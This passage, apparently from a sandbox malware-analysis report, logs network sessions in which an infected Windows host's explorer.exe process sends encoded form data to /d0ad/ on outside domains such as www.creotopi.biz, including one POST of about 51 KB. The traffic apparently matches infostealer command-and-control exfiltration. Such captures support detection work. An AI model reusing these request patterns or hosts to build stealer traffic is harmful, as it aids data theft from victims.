Oct 26, 2022 13:21:37.036020041 CEST	2278	OUT	Data Raw: 43 53 56 4a 73 73 4d 7a 36 50 6b 58 4a 54 37 5a 59 6c 61 6c 79 65 4f 31 71 75 4d 6d 67 46 37 6a 41 36 35 75 42 5f 6d 38 6e 4d 5a 77 57 61 38 50 7a 64 59 38 4b 53 35 69 6f 67 38 72 58 68 79 6e 43 59 64 33 74 69 6d 76 6b 44 39 30 5a 4e 38 73 70 79 Data Ascii: CSVJssMz6PkXJT7ZYlalyeO1quMmgF7jA65uB_m8nMZwWa8PzdY8KS5iog8rXhynCYd3timvkD90ZN8spyiXlmHias(CXDbFVNbdsV2OWD8ZgB3U0gb7nZq-jdY_rSetS1el~8CHocdIgEk0ELPgtltnUCq9UV0Mx1eGEfMiY_bFBu7Pn61vdor-NvygMYKm7qxrHnVcCq3dOvs4YKRsQQsn~u9upRgKpixLhWazcVwynQKSUrc
Oct 26, 2022 13:21:37.047271013 CEST	2280	OUT	Data Raw: 66 79 34 33 71 41 41 49 75 6a 37 58 49 44 79 45 6e 69 4b 4f 41 66 56 37 4e 46 61 7a 35 6c 55 6b 6a 7a 7a 46 63 4b 78 5a 7a 6c 77 4f 57 55 69 72 6d 73 61 73 78 67 41 42 7a 76 64 35 4f 74 5a 46 6a 57 5a 5f 5a 71 31 30 4e 4b 51 4e 72 76 52 6b 4e 32 Data Ascii: fy43qAAIuj7XIDyEniKOAfV7NFaz5lUkjzzFcKxZzlwOWUirmsasxgABzvd5OtZFjWZ_Zq10NKQNrvRkN2mDEjKwHx5q26s47Sum1tTtslP2h6snq4lhWhTNlDpaz9cdgcji5k3-o2pmeF6cUAWgyc7Oukd1uFkruMKWnAaop4an9MkXOHirl0~NIHikRc9Ur0rWERvRgzRIlwszA2bIVC6obT2E3RD7nOkrAK~ut7J831lLF9N
Oct 26, 2022 13:21:37.047419071 CEST	2283	OUT	Data Raw: 46 32 36 74 66 57 7a 2d 52 5f 39 73 51 67 4b 41 32 50 53 79 43 36 69 62 33 77 37 38 4e 72 78 36 78 54 74 52 73 4a 6a 77 58 47 66 79 77 4d 62 55 71 59 54 34 30 37 70 49 46 6f 37 72 76 70 52 4b 7a 58 51 67 59 4c 41 54 79 6e 37 6e 6b 78 72 44 54 68 Data Ascii: F26tfWz-R_9sQgKA2PSyC6ib3w78Nrx6xTtRsJjwXGfywMbUqYT407pIFo7rvpRKzXQgYLATyn7nkxrDThK1VgwE2rAvPmv-RisRKWx0J-NdRH8-zBAz2ADUrs0zYqhAw65uczo_1E1OIfwUBZFHIiBRJ69ow4vKZxtJiI1HSPns5oQyEJc2Hz0PgoVpifApIywyFTYXTKaBj5MeTKt1Sz8L6GENqIRKWzqbWcj7n7KmfujRPuH
Oct 26, 2022 13:21:37.047859907 CEST	2283	IN	HTTP/1.1 410 Gone Server: openresty Date: Wed, 26 Oct 2022 11:21:37 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 30 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6c 69 63 6b 74 68 65 6c 69 6e 6b 2e 78 79 7a 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='0; url=http://www.clickthelink.xyz/' />a </head>8</html>0
Oct 26, 2022 13:21:37.048226118 CEST	2286	OUT	Data Raw: 7a 73 51 32 55 52 39 57 41 62 76 61 61 68 4e 68 55 67 72 35 58 64 50 76 30 64 33 5a 4d 34 52 4c 4e 66 6e 50 39 41 45 7a 39 46 66 79 49 4c 59 54 6d 72 42 67 46 68 57 53 38 70 67 36 54 5f 34 53 34 53 66 4a 38 65 77 57 75 4f 59 57 71 32 79 6b 61 61 Data Ascii: zsQ2UR9WAbvaahNhUgr5XdPv0d3ZM4RLNfnP9AEz9FfyILYTmrBgFhWS8pg6T_4S4SfJ8ewWuOYWq2ykaa19cdN7hNEMJ3KHbb8b1Q1Wib2pwK1vnAGeKj~BNQWD9H0R0bfzjAaFGLxUwaWnjV0xawiPLJKpbNgZY9N9UceWM1gzuyQXPWAHFFfEld439TVTlSqWXeYRZbCSOGD5X_LD77CIoD20DULCIBGKIJhnnEaf57cSXCK
Oct 26, 2022 13:21:37.048403978 CEST	2291	OUT	Data Raw: 4c 48 7a 6e 7e 64 6a 32 46 67 6f 2d 32 66 30 52 66 65 4a 75 4f 44 7e 6e 47 4b 38 67 6d 4d 7a 2d 30 34 65 6b 47 57 64 6b 77 4c 59 45 6e 63 4e 6a 53 52 33 57 41 47 69 2d 73 4f 51 41 4a 66 41 32 50 5f 56 59 7e 63 53 4f 7e 67 28 63 4e 70 63 77 46 5f Data Ascii: LHzn~dj2Fgo-2f0RfeJuOD~nGK8gmMz-04ekGWdkwLYEncNjSR3WAGi-sOQAJfA2P_VY~cSO~g(cNpcwF_m-d5KcxY~7pld1arzSnELLGVbyaVpPIGXgp7ywYGpOVIshy1rMi5l4rUYDGGGhfOYP0P1jkn3rlbQXS91e6C6kT3z0wl3bnqgmDDAH16wAQVrgZ-Z-t7tbxBCYZ24Hb8YZqmwC3vApmt9bawb9a0eZ8fw6DEQc5gn
Oct 26, 2022 13:21:37.049068928 CEST	2293	OUT	Data Raw: 4b 6b 41 6e 35 69 46 49 71 41 4d 44 44 57 61 59 75 6d 68 50 61 70 6c 59 4e 64 35 75 34 32 48 4c 74 42 68 6b 4c 67 4a 51 4c 6e 44 71 34 4c 6b 66 69 49 39 33 6f 36 79 34 36 39 77 73 28 50 5a 47 73 46 50 46 58 4b 73 55 65 64 7a 53 6f 53 63 69 39 54 Data Ascii: KkAn5iFIqAMDDWaYumhPaplYNd5u42HLtBhkLgJQLnDq4LkfiI93o6y469ws(PZGsFPFXKsUedzSoSci9TZgDxJE0vMQDvzZ3SnM8Pm5w6o9Rm77TxZE1wCSNKPNiCrLbKnhfM21y5SuMl7L6wLrmCUwQGB_KM6TVA7NmUB1qkQOGvOJM50FFhduWRj-lVXidAyO7Uy-I6MrWzF9hHKROpHUtGHINUgtAlyj~F62EyWWmskbeNm
Oct 26, 2022 13:21:37.049278021 CEST	2304	OUT	Data Raw: 75 6a 53 6d 75 42 53 67 6e 33 59 33 6b 54 30 7a 37 53 59 77 62 30 42 48 30 72 4c 39 73 37 74 6b 41 4c 6b 4c 71 30 56 47 34 54 36 62 7e 4a 31 2d 59 36 57 63 74 37 67 2d 67 53 4d 2d 47 51 4b 62 62 65 51 41 4b 68 34 48 42 37 54 73 6f 6e 61 46 44 39 Data Ascii: ujSmuBSgn3Y3kT0z7SYwb0BH0rL9s7tkALkLq0VG4T6b~J1-Y6Wct7g-gSM-GQKbbeQAKh4HB7TsonaFD9XRwayG80iuQRXdtMBn2Tv5xCJuKCmdSOyrJ2ZTdPLqC-nWBk78DiL63uCH5kwYAeUwkLsBY2i0ac9oym(g1B5SUZxaV-xG78NGnCDO2nuH7rNeZWtJwOqfQTwLAxieSwih6ksdABnkB78xmzKWL3Xxfm0PAPE-8Et
Oct 26, 2022 13:21:37.058552027 CEST	2307	OUT	Data Raw: 53 67 51 35 58 33 33 4a 7e 4f 56 54 76 6a 28 35 69 55 48 62 4a 57 47 76 63 4d 78 42 28 49 53 57 51 48 75 78 7e 31 28 52 39 62 79 2d 48 46 30 35 37 53 52 69 68 34 67 5f 49 67 57 4d 58 77 63 6c 70 47 79 76 54 72 59 5f 33 52 4e 4a 69 5f 6c 67 38 33 Data Ascii: SgQ5X33J~OVTvj(5iUHbJWGvcMxB(ISWQHux~1(R9by-HF057SRih4g_IgWMXwclpGyvTrY_3RNJi_lg83hR72RdaMNiTCyLha2FHjAakun4UOhrdXFThTAbllzeU1g_w-XMJMtwDLl5vtHFX-bv3cXE7QCA7dZYDDkdPVndU6t4s_weDuvExi8uZIjGGbRU7zdG7fZ7YONXyURoCGScWGFirKnTKnJdW2I07my9Zz0TutMPenP
Oct 26, 2022 13:21:37.058718920 CEST	2314	OUT	Data Raw: 58 41 34 7a 45 64 54 4e 4d 66 33 4f 53 52 6f 64 6a 42 4c 55 6d 4e 6c 62 62 75 49 4c 63 4d 54 75 63 38 69 43 6b 6b 43 36 73 6d 34 44 68 5a 4d 65 59 37 77 69 66 43 64 4d 33 66 4b 4c 28 45 53 79 57 48 62 73 4e 4e 47 31 74 30 65 4e 28 67 4d 35 35 55 Data Ascii: XA4zEdTNMf3OSRodjBLUmNlbbuILcMTuc8iCkkC6sm4DhZMeY7wifCdM3fKL(ESyWHbsNNG1t0eN(gM55U40pfCympeT7vElNUoy4HoTEjMelkCqRijJMca2iEsLI0qAImulDYzyWUw82sErRSZ0PR6UV44YQnCmctRPQizi3lfpxCw8rrcSGWiftYmgrCzr5ME0ESotpNUz~9eA1VKWCv923-ls(IAo0R6ZGh66jMJI3vtIKxV
Oct 26, 2022 13:21:37.059448957 CEST	2317	OUT	Data Raw: 43 72 58 56 69 39 4c 63 42 64 5a 4b 67 51 69 68 69 50 36 44 58 75 45 55 52 5a 65 51 53 4a 36 33 69 44 68 61 4d 66 7e 2d 35 70 6d 46 41 54 6d 62 56 53 56 34 71 76 38 78 43 33 4c 66 34 35 4d 67 32 47 46 35 43 57 47 4f 52 48 34 4e 6a 77 43 73 67 77 Data Ascii: CrXVi9LcBdZKgQihiP6DXuEURZeQSJ63iDhaMf~-5pmFATmbVSV4qv8xC3Lf45Mg2GF5CWGORH4NjwCsgwZXFBn-QCEqD8Aaw4xP0VtHZox3ESX3HskyWCb9ZmroPInlZR(Puu0F1C5HaHsBxvrQe2aVxuUgbOzl~9mifu4qwLl5pUBuZSMak18YJ0N41tEuQJRcP2IOm_Yg1tAOXGWphAcwrhnaJcDnneW1xIczYHwiJ9EVU0J

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
114	192.168.11.20	49959	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:21:39.066283941 CEST	2319	OUT	GET /d0ad/?jXu=kcJq9nCJTS4AFFwj7BlSbUJdrqCJ4OLHyr4dETNtRmrAiFNjS8qpkfsQCBiZREWazvDc3jnj6JXUK3q6f67/6iJXzv9OIKzSdg==&hZ=5jUpdPs HTTP/1.1 Host: www.clickthelink.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:21:39.077461958 CEST	2319	IN	HTTP/1.1 410 Gone Server: openresty Date: Wed, 26 Oct 2022 11:21:39 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 30 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6c 69 63 6b 74 68 65 6c 69 6e 6b 2e 78 79 7a 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='0; url=http://www.clickthelink.xyz/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
115	192.168.11.20	49960	162.214.80.106	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:21:44.286525965 CEST	2320	OUT	POST /d0ad/ HTTP/1.1 Host: www.creotopi.biz Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.creotopi.biz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.creotopi.biz/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 31 5f 41 46 77 31 62 33 70 32 4c 69 51 4b 72 79 4d 75 59 67 62 72 62 4f 73 44 6e 38 30 33 77 4a 44 73 33 61 75 64 4d 50 68 39 75 57 36 62 42 45 7e 7a 51 5a 37 43 45 50 46 4a 76 69 75 62 37 55 7a 56 52 36 53 4d 57 71 75 51 74 4c 4d 66 32 54 61 72 28 57 42 53 4e 52 51 4b 56 62 64 43 71 70 76 41 42 71 6e 48 61 5a 4e 53 75 38 65 6c 67 4d 43 6d 4c 34 69 43 44 37 4a 73 79 73 70 66 41 6e 33 54 36 42 66 52 31 43 64 5a 32 79 34 46 69 64 76 6c 48 6e 62 30 6d 53 56 2d 43 6a 66 56 32 6d 6c 4e 5a 41 36 41 30 2d 73 63 5a 6d 4f 68 66 66 38 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=1_AFw1b3p2LiQKryMuYgbrbOsDn803wJDs3audMPh9uW6bBE~zQZ7CEPFJviub7UzVR6SMWquQtLMf2Tar(WBSNRQKVbdCqpvABqnHaZNSu8elgMCmL4iCD7JsyspfAn3T6BfR1CdZ2y4FidvlHnb0mSV-CjfV2mlNZA6A0-scZmOhff8A).
Oct 26, 2022 13:21:44.482527971 CEST	2321	IN	HTTP/1.1 302 Found Date: Wed, 26 Oct 2022 11:21:44 GMT Server: Apache Location: http://www.creotopi.biz/cgi-sys/suspendedpage.cgi Content-Length: 233 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 72 65 6f 74 6f 70 69 2e 62 69 7a 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.creotopi.biz/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
116	192.168.11.20	49961	162.214.80.106	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:21:46.496068001 CEST	2322	OUT	POST /d0ad/ HTTP/1.1 Host: www.creotopi.biz Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.creotopi.biz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.creotopi.biz/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 31 5f 41 46 77 31 62 33 70 32 4c 69 53 71 62 79 4e 4e 77 67 4d 37 62 4e 70 44 6e 38 37 58 77 4e 44 74 4c 61 75 5a 55 66 30 66 4b 57 36 2d 46 45 35 78 34 5a 36 43 45 50 52 5a 76 6a 78 4c 37 68 7a 56 64 63 53 49 57 71 75 54 52 4c 4e 70 4b 54 64 62 28 52 4b 79 4e 53 58 4b 56 59 5a 43 72 6d 76 41 46 51 6e 44 4b 5a 4e 68 71 38 45 6e 34 4d 47 30 76 33 31 79 44 39 5a 63 79 72 6e 5f 41 70 33 54 32 34 66 56 35 38 64 76 65 79 35 6b 43 64 75 6c 48 6b 52 45 6d 56 64 65 44 56 54 41 44 54 38 4d 39 72 6a 44 5a 43 6f 39 42 78 41 6a 65 58 76 46 53 66 7e 4a 61 61 4b 32 34 42 75 65 66 35 76 4b 54 42 41 6d 34 36 63 32 45 5f 57 43 5a 45 4c 35 59 47 73 45 45 54 7e 6e 6d 45 52 44 38 51 57 52 4e 72 5a 7a 52 57 68 61 35 36 45 4b 61 46 41 77 4e 32 28 72 70 43 43 69 75 45 72 30 28 6a 6c 4a 66 4d 67 42 6a 6a 46 6b 6f 57 31 32 67 6e 72 66 38 6e 76 70 58 76 30 4c 52 58 39 47 72 67 36 45 50 6a 79 6f 4f 61 37 74 68 4f 42 32 7a 37 4c 70 53 34 79 32 28 75 4d 43 66 75 66 78 32 33 48 37 35 4f 77 55 58 4e 73 42 35 4f 45 33 47 6d 53 62 30 35 50 30 54 39 44 42 77 65 33 43 6d 42 42 59 53 62 38 4f 58 59 55 32 65 77 75 69 75 62 5a 35 75 63 68 44 4c 6b 6a 4c 6e 4d 34 52 33 62 57 50 6a 33 7e 53 55 5f 62 58 4c 5a 45 41 54 6a 56 43 79 51 71 78 61 6a 6a 37 68 59 45 73 48 36 63 33 72 32 36 51 77 4f 6d 51 6c 2d 68 4a 56 77 63 59 45 52 58 5a 4f 71 62 6e 51 55 58 38 76 79 4e 36 56 4d 73 4b 66 2d 59 6a 71 71 4c 57 36 34 46 54 5a 43 37 59 4a 68 6d 61 79 77 68 63 66 4d 31 47 61 6e 4b 43 65 41 4b 6e 34 72 7a 6b 6a 39 56 7a 7e 4d 53 47 35 65 32 2d 64 57 66 41 41 76 39 64 36 31 46 65 49 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=1_AFw1b3p2LiSqbyNNwgM7bNpDn87XwNDtLauZUf0fKW6-FE5x4Z6CEPRZvjxL7hzVdcSIWquTRLNpKTdb(RKyNSXKVYZCrmvAFQnDKZNhq8En4MG0v31yD9Zcyrn_Ap3T24fV58dvey5kCdulHkREmVdeDVTADT8M9rjDZCo9BxAjeXvFSf~JaaK24Buef5vKTBAm46c2E_WCZEL5YGsEET~nmERD8QWRNrZzRWha56EKaFAwN2(rpCCiuEr0(jlJfMgBjjFkoW12gnrf8nvpXv0LRX9Grg6EPjyoOa7thOB2z7LpS4y2(uMCfufx23H75OwUXNsB5OE3GmSb05P0T9DBwe3CmBBYSb8OXYU2ewuiubZ5uchDLkjLnM4R3bWPj3~SU_bXLZEATjVCyQqxajj7hYEsH6c3r26QwOmQl-hJVwcYERXZOqbnQUX8vyN6VMsKf-YjqqLW64FTZC7YJhmaywhcfM1GanKCeAKn4rzkj9Vz~MSG5e2-dWfAAv9d61FeI.
Oct 26, 2022 13:21:46.693427086 CEST	2323	IN	HTTP/1.1 302 Found Date: Wed, 26 Oct 2022 11:21:46 GMT Server: Apache Location: http://www.creotopi.biz/cgi-sys/suspendedpage.cgi Content-Length: 233 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 72 65 6f 74 6f 70 69 2e 62 69 7a 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.creotopi.biz/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
117	192.168.11.20	49962	162.214.80.106	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:21:48.717897892 CEST	2332	OUT	POST /d0ad/ HTTP/1.1 Host: www.creotopi.biz Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.creotopi.biz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.creotopi.biz/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 31 5f 41 46 77 31 62 33 70 32 4c 69 53 71 62 79 4e 4e 77 67 4d 37 62 4e 70 44 6e 38 37 58 77 4e 44 74 4c 61 75 5a 55 66 30 66 43 57 36 4d 4e 45 35 51 34 5a 39 43 45 50 53 5a 76 6d 78 4c 37 38 7a 55 31 59 53 4a 71 63 75 57 56 4c 4f 36 79 54 63 6f 58 52 50 79 4e 70 4a 61 56 61 64 43 72 79 76 41 42 4d 6e 44 4f 6a 4e 53 32 38 65 6e 49 4d 43 46 76 34 71 53 44 37 5a 63 79 5a 6a 5f 42 44 33 54 79 6f 66 56 39 38 64 70 65 79 34 57 4b 64 73 32 66 6b 57 55 6d 57 58 2d 44 47 59 67 43 74 38 4d 5a 5f 6a 44 59 5f 6f 34 68 78 41 68 57 58 75 47 37 4a 28 70 61 61 4c 32 34 43 6b 2d 43 2d 76 4b 65 45 41 69 77 36 63 78 41 5f 58 69 5a 45 50 64 4d 42 38 30 45 56 30 48 6e 53 56 44 35 66 57 52 5a 56 5a 33 42 57 68 4b 64 36 46 35 69 46 51 68 4e 32 79 72 70 45 4e 43 75 74 79 45 7e 69 6c 4a 50 32 67 46 58 7a 46 6a 51 57 30 58 41 6e 70 2d 38 67 6d 70 58 70 34 72 52 4f 72 47 6d 30 36 45 66 5f 79 6f 4f 4b 37 73 31 4f 41 46 72 37 4b 73 6d 37 7a 47 28 74 59 79 65 30 4a 42 71 48 48 37 6c 34 77 55 76 64 73 43 56 4f 65 58 47 6d 58 34 4d 36 46 45 54 36 49 68 77 41 71 79 6d 53 42 59 75 32 38 4d 36 6a 55 48 79 77 73 53 65 62 4f 35 75 54 78 7a 4c 34 74 72 6d 47 79 42 33 62 57 50 76 4a 7e 53 49 5f 62 48 7a 5a 65 57 6a 6a 52 51 61 51 73 78 62 6d 6a 37 68 46 45 73 36 45 63 33 54 70 36 54 35 72 6d 53 4a 2d 68 62 39 77 5a 61 38 51 52 70 4f 72 5a 58 51 44 5a 63 6a 6c 4e 36 4a 45 73 4c 76 75 62 51 65 71 5a 43 61 34 42 54 5a 44 7e 34 4a 69 32 4b 79 69 72 38 53 54 31 48 79 33 4b 43 36 51 4b 6c 6f 72 7a 43 32 61 4b 7a 75 59 41 55 77 32 78 72 68 5a 57 79 67 45 70 64 61 49 58 70 58 41 58 66 65 49 71 53 77 6f 51 38 76 76 36 59 6c 6f 66 76 64 32 67 64 38 31 68 6a 45 78 49 34 42 4d 61 36 53 62 59 43 52 72 59 2d 76 4b 46 59 45 34 61 56 30 5f 50 75 43 48 78 66 33 59 68 4d 77 48 30 70 46 79 39 51 4a 6b 67 50 7e 6d 47 52 37 35 46 71 42 4b 4f 37 59 49 75 51 62 45 67 4d 53 41 70 36 73 45 7e 54 30 66 61 61 75 2d 64 74 53 66 31 51 45 4d 6d 47 36 54 33 45 49 54 4c 50 58 33 6c 31 43 4a 41 44 35 56 48 59 75 31 53 79 47 34 36 62 56 6b 45 34 76 42 48 37 50 77 74 77 4d 75 42 76 51 58 69 45 50 42 57 2d 66 30 47 55 61 49 69 6b 43 32 4a 6f 48 46 39 36 48 55 74 52 47 52 58 73 38 4e 57 52 30 4b 38 76 45 5a 77 74 4f 30 46 73 5a 58 33 31 33 61 63 79 73 33 61 45 59 6a 43 61 64 34 34 72 38 6c 71 67 45 67 4c 76 71 56 74 4f 66 62 45 75 4a 7a 55 53 6f 65 6a 51 39 74 7a 4c 58 4b 7e 69 75 49 31 6a 65 47 4b 72 71 77 4b 4a 5a 77 37 57 6f 7a 74 65 78 45 79 41 70 68 38 66 41 33 66 6f 28 4e 34 5f 39 52 31 52 58 42 4c 59 50 32 37 71 61 51 4f 4e 70 7a 32 43 56 66 74 32 56 78 75 68 4e 65 48 36 79 6a 59 63 31 42 6c 69 46 51 50 73 34 31 38 43 52 6c 51 58 46 57 6d 77 69 6c 4a 49 71 52 61 42 32 4e 4d 67 6b 58 51 69 4a 4a 74 6a 45 2d 43 48 4f 71 70 6e 36 35 53 64 52 4d 45 43 6e 43 41 6c 67 59 68 77 52 51 66 79 49 58 4a 57 66 4b 55 41 73 56 34 54 79 4c 6c 4d 6f 5f 44 39 7a 2d 6d 77 67 6d 4c 4f 77 66 64 41 46 77 34 42 6a 53 77 4b 68 54 71 66 44 79 41 2d 78 64 47 4c 6d 4a 51 7a 44 62 69 64 69 66 39 6a 74 6b 57 44 59 33 4e 5f 62 4e 4e 6e 47 31 71 51 38 6f 6b 72 7a 31 42 71 56 69 43 74 45 54 41 71 4c 56 46 70 55 56 72 4b 66 46 6b 41 7e 35 28 30 4d 43 46 74 51 45 55 51 37 79 53 55 4d 42 54 43 38 71 63 42 4e 61 66 32 7a 53 5a 58 47 43 6d 78 53 66 33 2d 62 33 6a 64 79 43 72 65 7e 5a 36 46 7a 72 49 4a 57 49 4d 6e 58 4c 42 4d 68 54 59 56 43 2d 52 7a 66 4e 43 2d 59 37 61 31 6a 6b 4a 71 31 37 50 53 4e 69 6d 33 35 76 6c 4b 71 65 50 65 66 52 70 5a 37 4e 33 51 48 49 57 37 42 45 4e 32 76 44 6e 62 43 67 49 64 42 4b 58 79 49 67 56 67 43 79 65 69 7a 4f 6e 5a 48 75 48 4c 5a 34 56 4a 54 46 55 6c 77 6f 73 76 42 42 41 64 32 50 44 33 54 70 30 4c 52 78 6d 59 41 52 4b 41 65 58 51 52 72 61 59 7a 69 69 4e 64 34 47 78 6e 32 41 33 61 65 62 55 75 4d 2d 6b 6b 77 35 65 41 36 32 4e 68 68 41 68 42 41 64 6c 4c 68 34 4a 74 58 75 67 4d 38 31 75 74 31 44 4b 4f 55 74 35 45 4f 73 4c 76 43 53 78 7a 6b 31 56 32 4f 44 31 44 30 4c 75 4d 48 74 6c 5a 66 62 41 72 68 46 6a 4c 7a 58 70 45 78 43 5a 59 51 72 58 68 36 67 66 6a 59 72 4e 42 65 66 43 51 64 45 59 79 57 51 46 70 4c 54 71 41 5a 6d 46 46 66 6c 31 7a 4d 55 49 77 56 54 49 68 63 6e 70 58 69 Data Ascii: jXu=1_AFw1b3p2LiSqbyNNwgM7bNpDn87XwNDtLauZUf0fCW6MNE5Q4Z9CEPSZvmxL78zU1YSJqcuWVLO6yTcoXRPyNpJaVadCryvABMnDOjNS28enIMCFv4qSD7ZcyZj_BD3TyofV98dpey4WKds2fkWUmWX-DGYgCt8MZ_jDY_o4hxAhWXuG7J(paaL24Ck-C-vKeEAiw6cxA_XiZEPdMB80EV0HnSVD5fWRZVZ3BWhKd6F5iFQhN2yrpENCutyE~ilJP2gFXzFjQW0XAnp-8gmpXp4rROrGm06Ef_yoOK7s1OAFr7Ksm7zG(tYye0JBqHH7l4wUvdsCVOeXGmX4M6FET6IhwAqymSBYu28M6jUHywsSebO5uTxzL4trmGyB3bWPvJ~SI_bHzZeWjjRQaQsxbmj7hFEs6Ec3Tp6T5rmSJ-hb9wZa8QRpOrZXQDZcjlN6JEsLvubQeqZCa4BTZD~4Ji2Kyir8ST1Hy3KC6QKlorzC2aKzuYAUw2xrhZWygEpdaIXpXAXfeIqSwoQ8vv6Ylofvd2gd81hjExI4BMa6SbYCRrY-vKFYE4aV0_PuCHxf3YhMwH0pFy9QJkgP~mGR75FqBKO7YIuQbEgMSAp6sE~T0faau-dtSf1QEMmG6T3EITLPX3l1CJAD5VHYu1SyG46bVkE4vBH7PwtwMuBvQXiEPBW-f0GUaIikC2JoHF96HUtRGRXs8NWR0K8vEZwtO0FsZX313acys3aEYjCad44r8lqgEgLvqVtOfbEuJzUSoejQ9tzLXK~iuI1jeGKrqwKJZw7WoztexEyAph8fA3fo(N4_9R1RXBLYP27qaQONpz2CVft2VxuhNeH6yjYc1BliFQPs418CRlQXFWmwilJIqRaB2NMgkXQiJJtjE-CHOqpn65SdRMECnCAlgYhwRQfyIXJWfKUAsV4TyLlMo_D9z-mwgmLOwfdAFw4BjSwKhTqfDyA-xdGLmJQzDbidif9jtkWDY3N_bNNnG1qQ8okrz1BqViCtETAqLVFpUVrKfFkA~5(0MCFtQEUQ7ySUMBTC8qcBNaf2zSZXGCmxSf3-b3jdyCre~Z6FzrIJWI